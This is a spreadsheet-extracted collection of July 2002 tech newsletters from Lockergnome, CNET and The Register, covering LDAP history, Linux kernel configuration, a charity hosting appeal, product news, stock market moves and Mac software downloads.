method that they've employed, I felt obligated to give it a 
spin. You can check out the September 2002 Issue of the Digital 
Edition and see if you like reading the mag in that 
format better than the print variety. A Software and 
Accessories Encyclopedia is also new to the site since my 
last belated visit.I've also been using my PocketPC quite a bit lately, but 
not for data. It's found a more frequent home on my belt as 
an MP3 player ever since Diana's dad gave us a bicycle. 
Going out for a morning ride has been quite pleasurable, and 
it's nice to bring along some tunes. I've tried both the 
Compaq iPaq 3870 and HP Jornada 565, and have been more 
pleased with the audio ability of the iPaq, due in part to 
the sound utility Compaq provides to adjust treble and bass 
levels. It's just a more full-sounding device, in my 
opinion. See You in August,Â Â Â Â Â Â Â Â Â Â Â Â Â Â Randy NielandÂ Â Â Â Â Â Â Â GnomeNETWORK
LDAP Whodunit
Pondered by Warren Dugas"Randy, a little question for you: Do you know what LDAP is and how important it is to the world of technology? I'm sure you do - but where did it come from? Hmm, let's put our thinking caps on and try to figure it out. Did Microsoft create it? Hmm - No, how about Novell? Nope. Well, who then?"History of LDAP http://www.microsoft.com/TechNet/prodtechnol/winntas/evaluate/featfunc/ldapcmr.asp
X.500, the OSI directory standard, defines a 
comprehensive Directory Service, including an information 
model, namespace, functional model, and authentication 
framework. X.500 also defines the Directory Access Protocol 
(DAP) used by clients to access the directory. DAP is a full 
OSI protocol that contains extensive functionality, much of 
which is not used by most applications. DAP is significantly more complicated than the more 
prevalent TCP/IP stack implementations and requires more 
code and computing horsepower to run. The size and 
complexity of DAP makes it difficult to run on thin clients, 
such as the PC and Macintosh where TCP/IP functionality 
often comes with the machine. DAP stack implementations are 
cumbersome to administer, thus limiting the acceptance of 
X.500. Hence in 1993, the folks at University of Michigan, 
with help from the ISODE Consortium, designed and developed 
a protocol that would work over TCP/IP and was small enough 
when implemented to run on a thin client like PC's running 
the Windowsï¿½ operating system or the Macintosh. The LDAP version 1 Specification was published in March 
of 1994. The LDAP version 2 Specification was published as 
rfc 1777 by the Access Searching and Indexing of Directories 
(ASID) working group in the IETF in March of 1995. In April 
of 1996, 40 companies including Microsoft, Netscape, and 
Novell separately announced support for LDAP protocol in 
their Directory Services products in order that they may in 
turn operate with each other and integrate with the 
Internet. LDAP version 3.0 has gone through several drafts 
but at this time is not finished. 
Â GnomeSYSTEM
Looking for Sound
Suggested by Corey Holletthttp://www.turtlebeach.com/site/products/santacruz/whatdoineed.asp
http://www.3dsoundsurge.com/reviews/earlyimpressions/ProMedia51.html
"I've just gone on an extensive hunt for the best 
sound card and speaker set combination for 5.1 sound. My 
criteria were that it be excellent for games, music, and dvd 
playback. A price under $500.00 was also a strong 
point."
Corey came to the same conclusion that others have in two 
respects. Creative has long maintained a healthy share of 
the sound card market with a solid name and decent products. 
Audiophiles know of other brands as well, such as Turtle 
Beach and Philips, which also produce quality sound cards 
and at attractive price points. Corey decided on the Turtle 
Beach Santa Cruz card, a great choice. His choice of speaker systems reinforced my own feelings 
on the subject. I own two Klipsch speaker sets, the ProMedia 
2.400 and most recently the ProMedia 5.1. The 2.400 system 
was the subject of many positive reviews, and believe me 
when I say that the ProMedia 5.1 leaves the 2.400 in the 
dust. The above review that Corey pointed out hits the high 
points, and is actually quite in-depth for an "initial" 
review. I'm itching to see if they eventually do write up a 
more complete version, as mentioned in the article. 
Â GnomeALERTZ
Today's Top 5 kbAlertzQ269272 - Mail Client Address List Truncated Using "Mailto:" Link If Tag Exceeds 260 Characters (Q269272)
Q313043 - FIX: Creation of Local Cube Fails (Q313043)
Q320273 - Subfolders of a Web Folder Are Not Enumerated in the Folders Pane in Windows XP (Q320273)
Q241210 - Drive List Shows Only Program Drive in 16-Bit and 32-Bit Programs (Q241210)
Q241189 - SNMP Memory Leak in Windows NT4.0 Peer-to-Peer Network (Q241189)GET HIGH-SPEED ACCESS: Verizon Online DSL is an affordable, 
high-speed Internet connection.  
Click here 
to see if Verizon Online DSL is available in your area.Recommend It!
Â GnomeASSISTANT
QuickTime 6 Released
http://www.apple.com/quicktime/download/
With the debut of QuickTime 6, we can assume that the 
licensing haggles over MPEG-4 have been resolved, making way 
for the long-awaited release. MPEG-4 isn't the only 
addition, joining a new AAC audio codec that is a favorite 
among professionals. Streaming media skip protection, Flash 
5 support and better AppleScript functionality also tag 
along. As always, there is a standard free version available 
for download, but the Pro edition adds additional features, 
such as full screen video playback, the ability to create 
MPEG-4 content and editing features not present in the free 
player.
Â GnomeSTUFF
Microtel &amp; WalMart Love Linux
http://www.theregister.co.uk/content/4/26192.html
WalMart is selling Microtel PCs, but with a slight twist. 
They were one of the first manufacturers to preinstall 
LindowsOS and offer systems to the retail market through 
WalMart.com, and now Mandrake is being offered as a pre-
installed choice in operating systems. These options give 
potential Linux users an easier way to get started without 
having to build their own system from scratch or deal with 
driver issues, while still maintaining a low overall cost. A 
Pentium 4 2GHz system with a CD-RW drive goes for as little 
as $648 with Mandrake Linux, so not too shabby at all.
Recommend It!http://www.lockergnome.com/issues/techspecialist/20020716.html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</si>
  <si>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20020715 Lockergnome Penguin ShellÂ  07.15.2002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today!You're a good bunch, you Penguins.Today's GnomeVOICE really tells the story better than I can, but I'll give you a quick summary. Through your efforts and compassion, reader Karl Steenblik has 
found a new electronic home for the Foundation for Children and Youth With 
Diabetes. I'll let Karl tell you which offered solution suited his needs. But, 
with the volume of responses his request for help generated, it's almost 
irrelevant. As I expected, we came together as a community and collectively 
offered him many viable choices from which to pick a solution that would work 
for the kids. The global scope of your concern and our collective ability to 
effect a change has humbled me once again. Just when you start to get a little 
callous about the 'Net ...Accordingly, I'd like to sketch out an idea with you that can be an ongoing part of Penguin Shell. It's an open discussion, really, about how we can further put 
our technical skills (be they Linux or Windows skills) to work for a good cause. I'm proposing that we start an organized volunteer effort, based in the 
Penguin Shell readership, to provide volunteer technical services to worthwhile 
charitable organizations. First, we need a name that clearly describes our purpose. Next, we need 
volunteers with the time and ability to lend those skills to a good cause. Finally, we'll need some suggestions as to 
the charitable organizations that are near and dear to your heart. Or, maybe the organization is one you're already working with - one you're certain 
can use some hands-on or remote volunteer help.I'll start that ball rolling with a personal organizational suggestions - the Aicardi Syndrome Foundation. 
Though I don't currently know their technical needs, I do know that the syndrome is very rare - read "research and technical dollars are minimal." I'm sure we 
can, as a group, provide them a way to fill existing technical holes.That's just a suggestion. Feel free to use the mailto links above to make 
others.Over the next few weeks, I plan on modifying my current favorite blogging 
program, GeekLog 
to pull together a community project area where interested parties can gather, 
coordinate and discuss whatever this project might become. I'll keep you posted 
on the details.In one of the earliest issues of Penguin Shell, I told a story about Emperor 
Penguins - how they huddle together on the shore, knowing that their protection 
from predators lies in sheer numbers. When one takes the leap into the water, 
all the others follow; individual involvement for the good of the community.Where could the analogy possibly be more fitting?
Tony
Steidler-DennisonÂ Â Â Â Â Â Â Â GnomeTWEAK
Lockergnome readers, SAVE 50% on the Computing Encyclopedia!
Are you looking for the ultimate computing resource? Discover the
Computing Encyclopedia from Smart Computing.  Regular price $59,
SPECIAL OFFER for Lockergnome readers,
get 
your set TODAY, ONLY $29.95!Quick ShortcutsLinux is chock full of keyboard shortcuts that, when used, streamline the way 
you use your system. Today's Tweaks are really user tweaks - built in shortcuts 
you can use to maximize your Linux efficiency. You don't have to change your 
system, just how you use what's already there. They're two tips that are quick 
and very easy to learn and remember.Got a cluttered console screen? Use [ctrl]+l to clear it. This does the 
same thing as the clear command with far fewer keystrokes.Do you want to log out of the console screen quickly? Use the [ctrl+d key combination. This will log out the current user. If you're using bash and the 
current user is not root, the [ctrl]+d combination will close the terminal 
window, as well.To me, any opportunity to save keystrokes is a good one. Better yet, if I can 
avoid having to take my fingers from the keyboard to reach for the mouse, then 
I've really saved some time. Though it's tough to quantify the time savings 
using these keystroke combination shortcuts, intuitively I can tell you it's 
substantial.Maximum efficiency. That's what Tweaks are all about.
Recommend It!
Send us a 
GnomeTWEAKÂ GnomeCORE
Kernel Configuration - Part XIWe've covered some fairly light topics to this point in the kernel configuration series. Today's topic requires a bit of review. We'll discuss configuring block 
devices in your kernel.We've talked about the different types of devices in previous Penguin Shell 
issues. Fundamentally, the two that you'll deal with the most are block and 
character devices. These draw their type names from the way they handle data. 
Block devices receive data for storage in chunks, generally pre-set sizes of 
data "blocks." Hard drives are block devices. They'll only write chunks of data 
to storage. Thus, the problem with shutting down your machine uncleanly. Data 
intended for storage may not, in fact, have been written at the time your power 
dies or you hard kill your machine. The system may still be accumulating data up to the proper block size before committing it to the hard drive.Character devices, on the other hand, receive data in "streams," one character 
at a time. Serial ports are a great example of character devices. They handle 
data input and output on the fly, rather than filling a buffer then 
committing the data.The physical nature of these device types goes a long way toward explaining why 
they handle data as they do. A hard drive has to physically spin up to store or 
retrieve data. You're actually changing the magnetic properties of the disc 
surface when you store data. Consequently, a hard drive has to know where 
there's free space on the disc surface, has to move that area of the disc under 
the write head and try, as best it can, to group blocks of related data 
together.Character devices really don't store data as much as they send it off and forget about it. The process is purely electrical rather than electrical and physical. 
The serial port, for example, sends data in a stream to your Palm Pilot. The 
storage of the data is actually handled by the Palm itself, not a physical 
storage device on the computer. There's no need to spin up a drive and account 
for the data as is necessary with a hard drive. The Palm will also send a signal back to the computer confirming receipt of data. That's an indication that 
character devices often communicate in both directions, as well.So, when you're configuring block devices in your kernel, you're preparing the 
system for communicating with a device that will buffer data to a predetermined 
level, then write that data as a block, changing the physical properties of the 
hard drive disc surface. Even though that's the highest level view of the 
process, it still shows how difficult a process physical data storage really 
is.In the block device section, you'll find many options for physical data storage. When configuring this section, it's crucial to know as much about your existing 
hardware as possible. What type (brand) of hard drives are you using? What's the interface to the machine - IDE, parallel, etc? Where is the drive located - on 
the local machine or on a network-connected box? Because the variables are so 
broad, it's nearly impossible to give you a stock configuration tip that will 
work for your personal machine every time. I can tell you this - you will have 
block devices (normally a hard drive and a floppy), and you need to answer as 
many of the above questions as you can. Find out as much about these physical 
devices as you can, and the configuration process will be relatively 
painless.A warning - you'll see more configuration tips like this as the series continues to progress. I'll certainly make hands-on configuration recommendations where 
possible. There are quite a few areas where I can make such recommendations. 
However, where the variable set is as broad as block devices, much of the 
legwork will be up to you.Tomorrow, we'll talk about RAID and multi-device support in Linux.Recommend It!
Send us a GnomeCORE 
tipÂ GnomeFILE
rxLinuxhttp://www.fusionw3.com/rxlinux/ "The concept behind rxlinux is to centralise configuration and management of 
multiple Linux servers. New servers can be deployed in minutes. A Web interface 
is used to build custom ISO CD-ROMs dedicated for specific servers. Servers, 
also called rxnodes, boot up from that CD-ROM and get the rest of the 
configuration and software from a master server. No administration is done 
directly on the nodes; everything is controlled from the master servers. When 
the rxnode has finished booting up and all software is running, it is completely independent from the rxmaster until the next reboot."
Recommend It!
Send us a GnomeFILE 
suggestionÂ GnomeVOICE
Penguin Hearts
Scribbled by Karl Steenblik"I can not believe all of the help your posting to the Linux community has
generated.  I have had over 20 offers for help.  Some of the offers would
not fit our space needs but that number of responses shows that Linux
people care."I am overwhelmed with gratitude with Lockergnome and
http://digitaldaze.com/"Bill at Digitaldaze has sent us a large gift of 100 MB of space.  More
that I think we will ever use."I thank all of the people who offered help.  There are more generous
people than I can type to individually.  Our camp will hold Linux people
in the highest esteem and I will make sure Linux, Lockergnome, and
Digitaldaze have a prominent places on our site in the future."Soon you will be able to visit our new site at
http://fcyd.digitaldaze.com/."Now the work for me begins, moving the site!  Oh the labors of love that
make us whole."Everyone have a super day."Thank you again for all of your help.
Recommend It!
Speak your 
GnomeVOICEÂ GnomeCLICK
Software.Linux.Com
http://software.linux.com/index/Software.Linux.Com is the revitalized version of Linux.DaveCentral. True to its 
roots, the site is a great starting point for Linux software and information. 
Software is categorized under such headings as Audio, File Utilities, Office 
Applications, and System Utilities. The site also features up-to-date listings 
of the most recent and most popular Linux software, as well as a program of the 
day. This site will definitely get bigger, but even for now, it's got nearly any Linux app you're looking for.
Recommend It!
Suggest a 
GnomeCLICKhttp://www.lockergnome.com/issues/penguinshell/20020715.html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Win a Digital Camera
Â General Feedback
Â Chris's Blog
Â E-mail the Editor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
</t>
  </si>
  <si>
    <t xml:space="preserve">Microsoft reveals media XP detailsÂ Search
	                Â 
	                Â 
News.com
	                All CNETÂ Â Â Â 
	                The Web
                Â Live tech help NOW!
April's tech award
1 million open jobs
News.com: Top CIOs 
ZDNet: PeopleSoftJuly 16, 2002Microsoft reveals media XP detailsMac tech show set to open in New YorkHP trims Jornada unit in SingaporeTech giants hot on wireless unionUniversal appoints head of anti-piracyReport: FDIC not protecting dataÂ Special reportA clause for alarm
Learn to spot red flags in corporate software contracts ere you sign on the dotted line.
Read Full Story
Microsoft reveals media XP detailsMicrosoft on Tuesday gave an official name to an upcoming version of Windows XP that aims to make the PC a permanent part of the home entertainment center.
Originally code-named Freestyle, this entertainment version of Windows--which will go by the name Windows XP Media Center Edition--will appear on new PCs and PC hybrids in time for the holidays, the company revealed on Tuesday. With Windows Media Center, consumers will be able to use a TV remote control to catalog songs, videos and pictures, as well as check TV listings.
July 16, 2002, 4:00 AM PT
 | Read Full Story Mac tech show set to open in New YorkApple's iMac is all display--17 inches worth--and the "Jaguar" update to the Mac OS should bare its teeth as the Mac faithful gather in New York. They'll be looking to get a peek at what the computer maker has planned for the future.
July 16, 2002, 4:00 a.m. PT
 | Read Full Story HP trims Jornada unit in SingaporeHewlett-Packard has shuffled employees out of its Jornada Pocket PC development unit in Singapore, as the company continues to cut costs following its merger with Compaq Computer.
Jornada products are developed in Singapore and will be phased out by year's end, with the exception of Jornada 720, which resembles a mini-notebook. The model will eventually be rebranded as an HP iPaq device.
July 16, 2002, 11:05 AM PT | Read Full Story 
Tech giants hot on wireless unionSeveral tech and telecommunications giants are considering a joint venture to pepper the United States with wireless hot spots, according to reports.
Intel, IBM, AT&amp;T Wireless, Verizon Communications and Cingular Wireless are discussing the creation of a company that would build a network of wireless hot spots across the country, The New York Times reported Tuesday. Hotspots are publicly available wireless networks that use the 802.11b standard to deliver Internet access.
July 16, 2002, 7:50 AM PT
 | Read Full Story Universal appoints head of anti-piracyUniversal Music Group has created a new full-time position to help it combat piracy.
Lawyer and former music-television producer David Benjamin will fill the role as UMG's new senior vice president of anti-piracy.
July 16, 2002, 11:45 AM PT
 | Read Full Story Report: FDIC not protecting dataWeaknesses in the Federal Deposit Insurance Corp.'s IT strategy have left financial information open to attack, a new report says.
The report from the General Accounting Office identified "new weaknesses" in the FDIC's information systems controls that affect its ability to safeguard electronic access to sensitive data.
July 16, 2002, 8:55 AM PT
 | Read Full Story 
From our partners:Bezos believesBusiness Week
"We're still at the very beginning," says Amazon.com's founder. "There's so much more to come."
July 15, 2002
 | Read Full Story Stronger, smarter building in less timeBusiness Week
Pioneers in computer-aided design, architects are now using advanced technology to model their designs in ever-greater detail.July 16,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'Jaguar' may show its claws at MacWorld
Correspondent Melissa Francis and CNET News.com reporter Ian Fried talk about Jaguar, the anticipated update to Mac OS X and new, larger iMac flat-panel screens, both expected to be unveiled at this week's MacWorld.
 Watch Video
Â Â EnterpriseNorway snubs exclusive Microsoft dealsMcAfee.com sour on sweetened bidAT&amp;T, Sun come up with services dealE-BusinessSchwab profit falls with investor confidenceTech stocks seek good earnings newsMore hurdles await e-governmentCommunicationsIndustry preps for new cell standardNextel turns profit on customer demandTDS, U.S. Cellular end quarter with lossesMediaRadio stations appeal Web royaltiesLicensing decision ends MPEG-4 tiffCongress to weigh in on digital TVPersonal TechnologyMoxi moves into cable boxesDell squeezes Pentiums into notebooksSanta goes digital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</si>
  <si>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
Shopper Newsletter: Alerts1
Canon PowerShot S402
Canon PowerShot G2
3
Gateway 600XL
4
Dell Latitude C400
5
Cyber Shot DSC-F707
July 16, 2002 
From Computers4SureSave an extra $50 of Compaq's powerful iPaq H3835
 From buy.com Break free from convention with Sharp's Linux-powered Zaurus SL-5500!Computers4Sure
Sony CLIE PEG-NR70V 
								â€¢ Free shipping 
â€¢ Built-in digital camera/MP3 
â€¢ Built-in keyboard/color display 
								Â Â Just $599
Compaq iPaq H3835 
								â€¢ $50 rebate
								â€¢ Expandable Pocket PC
								â€¢ 64 MB, brilliant TFT screen
								Â Â Just $549 after rebate
Handspring Treo 90
								â€¢ Free shipping
								â€¢ Vivid color screen/keyboard
								â€¢ 16MB of memory/Palm OS 4.1
							    Â Â Just $299
 buy.com
 Palm m515 
								â€¢ Free shippingâ€¢ 16MB, Palm OS v4.1
								â€¢ MultiMediaCard slot				 
								Â Â Just $395
Sharp Zaurus SL-5500
								â€¢ Free shipping
								â€¢ 64MB, 3.5-in 65,536 color LCD
								â€¢ CompactFlash and SD expansion
								Â Â Just $398Compaq iPaq H3850
								â€¢ Free shipping
								â€¢ 64MB RAM, 65K color TFT
								â€¢ 206MHz Intel StrongARM, USB
								Â Â Just $549
 The e-mail address for your subscription isÂ qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org
UnsubscribeÂ |
Â Manage My Subscriptions
Â |Â FAQÂ |
Â Advertise        Copyright 2002 CNET Networks, Inc. All rights reserved.          .</t>
  </si>
  <si>
    <t>CNET Investor Dispatch
Quote LookupEnter symbol:Â· Symbol Lookup
Quotes delayed 20+ minutes
â€¢ My Portfolio
â€¢ Broker Reports
â€¢ IPOs
â€¢ Splits
â€¢ Messages
Â 
NXTP
4.42
36.42%
Â 
NXTL
6.53
30.60%
Â 
GENU
2.77
28.84%
Â 
BINX
3.9
25.81%
Â 
CYCL
2.759
23.67%
Â 
ASGN
9.0
-38.48%
Â 
PLUM
3.2
-28.87%
Â 
QFAB
9.92
-28.53%
Â 
SONT
2.16
-26.28%
Â 
RAZFD
3.511
-13.09%
Live tech help NOW!
April's tech award
1 million open jobs
News.com: Top CIOs 
ZDNet: PeopleSoftJuly 16, 2002 DJIA8473.11 Â -166.08
 NASDAQ1375.26 Â -7.36
 S&amp;P 500900.94 Â -16.99
 CNETÂ TECH992.91 Â -12.40Techs slump with Intel
With investors selling Intel shares before its post-market close earnings announcement, technology stocks dropped Tuesday.Despite generally upbeat remarks on the economy by Fed Chair Alan Greenspan and news of a profitable quarter from Nextel Communications, CNET's Tech index slipped 12.4 points, or 1.25 percent, to 992.91. The tech-laden Nasdaq composite index fell 7.36 points, or 0.53 percent, to 1,375.26.Worse-than-expected earnings from construction machinery maker Caterpillar helped depress broader markets. The Dow Jones industrial average lost 166.0 points, or 1.92 percent, to 8,473.1--for its seventh consecutive losing session. The S&amp;P 500 shed 16.99 points, or 1.85 percent, to 900.94--another multi-year low.
Microsoft reveals media XP details 
Microsoft on Tuesday gave an official name to an upcoming version of Windows XP that aims to make the PC a permanent part of the home entertainment center.
Originally code-named Freestyle, this entertainment version of Windows--which will go by the name Windows XP Media Center Edition--will appear on new PCs and PC hybrids in time for the holidays, the company revealed on Tuesday. With Windows Media Center, consumers will be able to use a TV remote control to catalog songs, videos and pictures, as well as check TV listings.MICROSOFT CORP 51.25 -1.06% Intel layoffs possible
Chipmaker Intel may be on the verge of announcing massive layoffs or other cuts amid a slow market for personal computers, according to reports.
Intel CEO Craig Barrett is scheduled to speak to employees after stock markets close Tuesday, according to The Wall Street Journal. At about the same time, the chipmaker will discuss its second-quarter results on a conference call with analysts.INTEL CORP 18.36 -3.97% Nextel Turns Profitable, Revenues Jump 
Nextel Communications Inc., the nation's No. 5 wireless telephone company, on Tuesday said it turned profitable in its second quarter, driven by strong customer demand that translated to a 25 percent revenue increase.
Nextel also said it expected 2002 operating cash flow of at least $3 billion compared with an earlier forecast calling for $2.5 billion.NEXTEL COMMUNIC'NS'A' 6.53 30.6% 
Also from CNET
Real-time stock quotes from CNET News.com Investor.30-day free trial!
Banc of America Securities begins coverage of Power Integrations with a "market performer" rating in tech notes 7/16/02 
Analyst Douglas Lee says the maker of power supply integrated circuits is building a market niche with a more efficient and reliable technology than traditional approaches to converting AC-to-DC power supplies. He also notes Power Integrations is expanding its market with DC-to-DC power supply products, and says the firm's growth is based on converting today's power supplies to its more efficient technologies. As a result, the company doesn't need a boost in end-market demand to grow, Lee says. Although he sees a large, untapped market for Power Integrations and likes its long-term prospects, Lee suggests the stock is fairly valued. He believes shares of POWI are unlikely to rise much in the short term.POWER INTEGRATIONS 18.72 5.23% 
Visit the Brokerage Center
French TV exec says Vivendi tapped him for CFO 
 A French television executive said on Tuesday he had been approached about taking over as finance chief at beleaguered media giant Vivendi Universal -- and acknowledged the job would be a "challenge."Jacques Espinasse, chief operating officer at French satellite TV consortium TPS, has been cited by the French press as a candidate for the financial hot seat at Vivendi, which is grappling with cash and debt problems in the wake of the sacking earlier this month of chairman Jean-Marie Messier.VIVENDI UNIVERSAL 15.38 -5.06%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</si>
  <si>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Ballmer 'fesses up to Linux/Windows cost FUD
    Just can't keep that myth alive
        http://www.theregister.co.uk/content/4/26230.html    Microsoft backs Web services security standard
    Security Assertion Markup Language
        http://www.theregister.co.uk/content/4/26211.html    Liberty Alliance unveils secure sign-on specs
    Authentic
        http://www.theregister.co.uk/content/4/26210.html    Peru mulls Free Software, Gates gives $550k to Peru Prez
    Funny old life...
        http://www.theregister.co.uk/content/4/26207.html    Unisys takes high and middle roads with new ES7000s
    Twin product streams
        http://www.theregister.co.uk/content/4/26205.html    Microsoft lifts veil on Corona media platform
    Ooh, you tease
        http://www.theregister.co.uk/content/4/26204.html    MS to ship Media Center 'special edition' of XP in Q4
    It's that remote control unit called Freestyle really...
        http://www.theregister.co.uk/content/4/26201.htmlEnterprise Systems    Soft landing for firms caught in Web host fallout?
    Silver lining
        http://www.theregister.co.uk/content/53/26220.html    IBM sends Shark into feeding frenzy
    Storage price wars
        http://www.theregister.co.uk/content/53/26212.html    HP pulls plug on enterprise software lines
    No Net Action
        http://www.theregister.co.uk/content/53/26209.htmlPersonal Hardware    PC makers to start taking the Tablets
    Mira Image
        http://www.theregister.co.uk/content/54/26222.htmlSemiconductors    Nvidia intros nForce 2 
    The chipset formerly known as Crush 18
        http://www.theregister.co.uk/content/3/26216.html    Fears emerge over Intel job cuts 
    Fab 17 for the chop?
        http://www.theregister.co.uk/content/3/26214.htmlInternet    HP suspends 100+UK staff in email porn probe
    ExclusiveFiring squad        http://www.theregister.co.uk/content/6/26227.html    We don't need no stinking ID cards
    Privacy International FAQ
        http://www.theregister.co.uk/content/6/26224.html    Govt unveils plans for eDemocracy
    Just 'elastoplast for a sickly politics'
        http://www.theregister.co.uk/content/6/26221.html    MPEG 4 is go (licence fees capped)
    Apple dances Quicktime 6 gig
        http://www.theregister.co.uk/content/6/26219.html    UK2.net suffers outage
    Like an 'alien abduction'
        http://www.theregister.co.uk/content/6/26218.html    TFI wants suspended ISP service 'to be sorted'
    The Free Internet liquidation has 'no bearing'
        http://www.theregister.co.uk/content/6/26208.html    Yahoo! censors portal, kisses Beijing's ass
    Mmmm, good!
        http://www.theregister.co.uk/content/6/26203.htmlNet Security    Snouts in the honeypot
    Get your Digital Ant Farm here. Only $50K
        http://www.theregister.co.uk/content/55/26229.html    US Congress approves life terms for crackers
    Bill aims to turn ISPs into snitches
        http://www.theregister.co.uk/content/55/26217.html    Gweeds gets killed
    Letters Too easy by half        http://www.theregister.co.uk/content/55/26202.html    O2 security bubble pricked
    Lame coding error gives up u/n, pw
        http://www.theregister.co.uk/content/55/26200.htmlAnti-Virus News    Frethem worm poses as Password file
    More shenanigans
        http://www.theregister.co.uk/content/56/26225.htmlBusiness    Ballmer 'fesses up to Linux/Windows cost FUD
    Just can't keep that myth alive
        http://www.theregister.co.uk/content/7/26230.html    Banks seal Energis takeover 
    Norman conquest        http://www.theregister.co.uk/content/7/26215.html    NAI sweetens McAfee.com bid 
    A spoonful of sugar makes the poison pill go down
        http://www.theregister.co.uk/content/7/26206.htmle-business    Microsoft backs Web services security standard
    Security Assertion Markup Language
        http://www.theregister.co.uk/content/23/26211.html    Liberty Alliance unveils secure sign-on specs
    Authentic
        http://www.theregister.co.uk/content/23/26210.htmlThe Mac Channel    MPEG 4 is go (licence fees capped)
    Apple dances Quicktime 6 gig
        http://www.theregister.co.uk/content/39/26219.htmlChannel Flannel    Sun UK resellers under email siege
    And told to stay away from France
        http://www.theregister.co.uk/content/51/26226.htmlSite News    Reg Hackerettes - The jury delivers its verdict
    You spoke, we listened
        http://www.theregister.co.uk/content/31/26213.html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</si>
  <si>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CNET | DOWNLOAD DISPATCH(Mac Edition)
July 16, 2002
Vol. 7, No. 28A Screen DreamGood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feed:http://clickthru.online.com/Click?q=c2-oXxLQUEkRh6pmyFgVnxXFZcIuInR Also this week, we've got QuickTime 6, the media player's long-
awaited first foray into MPEG-4 technology; Cartoon Editor, a
graphic editor that will help you make QuickTime cartoons;
MoonDock, so you can keep track of moon phases on your desktop;
WebDesign, a full-featured HTML editor with lots of extras; and
Sigma Chess Lite, so you can challenge your mind and develop
your skills at the ancient game of chess.Enjoy!Jason Parker
Assistant Editor, CNET Download.com
--(Unsubscribe instructions are at the bottom of this
newsletter.)&lt;---------------Advertisement---------------&gt;Gateway High Performance Desktops - starting at $699!High Performance, the 500 Series goes beyond the basics and
features some of the latest technology.  With new sleek
platinum cases, systems include Intel(R) Pentium(R) 4
processors, USB 2.0 support, Mid-Tower chassis, Broadband
Ready and Microsoft(R) Windows(R)XP.  Click here for details!http://clickthru.online.com/Click?q=d7-wk3ZQLWkDhLMkvyRmBekeVktk2eR &lt;-------------------------------------------&gt;IN THIS ISSUE:1. This Week's Top 10 Downloads
2. Pick of the Week: Marine Aquarium
3. The Week in Wares:
              - Multimedia and design: QuickTime, Cartoon Editor
              - Home and education: MoonDock
              - Development tools: WebDesign
              - Games: Sigma Chess Lite
4. Updates &amp; Drivers
5. The Week in Reviews: A TiVo-like toy for the Mac?
6. Overheard on Download.com
7. Download.com Outage NoticeP.S. Got a suggestion for CNET Download.com? Send it to:
suggestions@download.com
_____________________________________________________________1. This Week's Top 10 Downloads   1. LimeWire 2.4.4                         6,190 downloads
   2. LimeWire (OS X) 2.4.4                  4,561 downloads
   3. MacSatellite  1.6.1                    4,313 downloads
   4. Hotline Connect Client 1.8.5           3,656 downloads
   5. RealPlayer 8.0                         2,939 downloads
   6. Deck 3.5                               2,908 downloads
   7. Fetch 4.0.1                            2,333 downloads
   8. Internet Explorer 5.1.4                2,229 downloads
   9. Marine Aquarium 0.99.0                 1,837 downloads
  10. Internet Explorer (OS X) 5.2.1         1,820 downloadsFor more details on Download.com's most popular files, click
here: http://clickthru.online.com/Click?q=ec-MHyXQVy2Fg64heA1kOqFb2GVaGyR 
______________________________________________________________2. Pick of the Week   MARINE AQUARIUM
   Version: 0.99.0
   File size: 3MB
   License: Free to try; $12.95 to buy
   Minimum Requirements: Mac OS X   As the name suggests, this program puts an incredibly
   realistic aquarium of saltwater fish on your screen. You can
   select from a variety of highly textured fish to swim across
   your desktop, and you can control variables such as lighting
   and the number of fish. There is even a starfish that you can
   track over time to watch how it adapts to its environment.   http://clickthru.online.com/Click?q=01-9oXDI2jHs5fAjPfvurMPGPxZ6RlR    Want to review Marine Aquarium? Submit your opinion here:
   http://clickthru.online.com/Click?q=17-agitI5XroKlI4b9Iz4s1RhjGRseR    Find all of our Picks here:
   http://clickthru.online.com/Click?q=2c-DatOIc0DRUD42bbc-r7MBvWpjuyR 
______________________________________________________________3. The Week in Wares   IN MULTIMEDIA AND DESIGN:   QUICKTIME
   Version 6.0
   File size: 402K
   License: Free
   Minimum requirements: Mac OS 8.6/9.x or Mac OS X   The latest version of Apple's premiere media application
   supports the increasingly popular MPEG-4 codec for high-
   quality, highly compressed video, as well as modern formats
   such as AAC (Advanced Audio Codec) and JPEG 2000. It also
   provides skip protection, an enhanced user interface with a
   more intuitive and useful Favorites menu, new developer APIs,
   and other useful features such as support for Flash 5 files.   http://clickthru.online.com/Click?q=41-qqJ1IEKIeDjNLmwU5CfCkxHB0FFR    Want to review QuickTime? Submit your opinion here:
   http://clickthru.online.com/Click?q=56-NwKYInnsvJh4BuHrctPQDwwaMC9R 
   CARTOON EDITOR
   Version: 1.2.1
   File size: 2.38MB
   License: Free
   Minimum requirements: Mac OS X   Cartoon Editor won't turn you into a gifted cartoonist
   overnight. But what this graphic editor will do is make quick
   work of creating short QuickTime movies and animated GIFs--
   and for OS X freeware, it doesn't get much better than that.
   Cartoon Editor lets you draw or import JPEGs and GIFs, which
   you can then manipulate with a set of tools that lets you
   group, scale, duplicate, ghost, and all sorts of other useful
   cartoony things. The program's Java2D foundation allows for
   some surprisingly powerful features, like gradients,
   antialiasing, splining, and transparencies.   http://clickthru.online.com/Click?q=6b-8g5ZIHEcOAstO5H80ywQ-4d0P6cR    Want to review Cartoon Editor? Submit your opinion here:
   http://clickthru.online.com/Click?q=80-KTKvQQ0KYe11T0DoaDkjVsTLZ8iR    Find all of the latest multimedia and design software here:
   http://clickthru.online.com/Click?q=95-XdwrQvdJfe0atPOr1yZeU_u_KnPR 
   IN HOME AND EDUCATION:   MOONDOCK
   Version: 1.2.2
   File size: 1.95MB
   License: Free
   Minimum Requirements: Mac OS X   Get in touch with the natural rhythms of our solar system
   with MoonDock, a simple piece of software that tracks the
   phases of the moon for you and displays lovely images of our
   planet's companion satellite on your desktop. The images are
   high-quality color photos that change over time in accordance
   with the date. MoonDock includes both astronomical and survey
   data, meaning that you can calculate the appropriate moon
   phase for a particular date and identify topographical
   features on the moon using a built-in catalog of those that
   have been surveyed by astronomers and astronauts. This update
   incorporates improved help features and a few bug fixes.   http://clickthru.online.com/Click?q=aa-gBteQXUr_tMV_meWLXZBXqONOVnR    Want to review MoonDock? Submit your opinion here:
   http://clickthru.online.com/Click?q=bf-JtRfQ8Zrg9xPaKu5w8PF_jEuwteR    Find all of the latest home and education software here:
   http://clickthru.online.com/Click?q=d4-E0SqQ0ExoPq8KVw_4Mc3148lk6yR 
   IN DEVELOPMENT TOOLS:   WEBDESIGN
   Version: 1.6
   File size: 1.5MB
   License: Free to try; $28.95 to buy
